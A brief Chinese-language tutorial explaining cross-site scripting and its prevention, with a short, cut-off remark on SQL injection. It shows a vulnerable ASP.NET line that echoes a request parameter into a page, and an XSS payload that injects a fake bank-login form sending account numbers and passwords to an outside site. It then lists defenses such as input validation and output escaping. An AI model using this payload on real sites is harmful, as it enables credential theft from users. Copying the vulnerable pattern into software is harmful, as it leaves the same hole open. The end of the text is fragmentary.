XSS漏洞攻擊與防止辦法

xss漏洞攻擊與防止辦法
xss又叫css教程 (cross site script) ，跨站指令碼攻擊。它指的是惡意攻擊者往web頁面裡插入惡意html代碼，當使用者瀏覽該頁之時，嵌入其中web裡面的html代碼會被執行，從而達到惡意攻擊使用者的特殊目的。

源頁面放一個標籤，在後台page_load裡面寫this.textlabel.text = request["msg"];

構建攻擊，讓攻擊後把資料傳遞到目標頁

構建代碼如下：

msg=<form action='http://www.zhutiai.com' method='get'>銀行帳號:<input type='text' name='id'/>密碼:<input type='text' name='pwd'/><input type='submit' value='login'/></form>

、解決辦法
  最重要的一點，就是提高意識嚴格控制輸入和輸出。具體執行的方式有以下幾點：

  第一、在輸入方面對所有使用者提交內容進行可靠的輸入驗證，提交內容包括url、查詢關鍵字、http頭、post資料等
  第二、在輸出方面，在使用者輸內容中使用<xmp>標籤。標籤內的內容不會解釋，直接顯示。
  第三、嚴格執行字元輸入字數控制。
  第四、在指令碼執行區中，應絕無使用者輸入。

=====================================================
sql注入
加入使用者提交的 內容裡面 含有 ; 號,那麼sql語句會被截斷....然後,後果就

 

頁面載入完畢後，執行login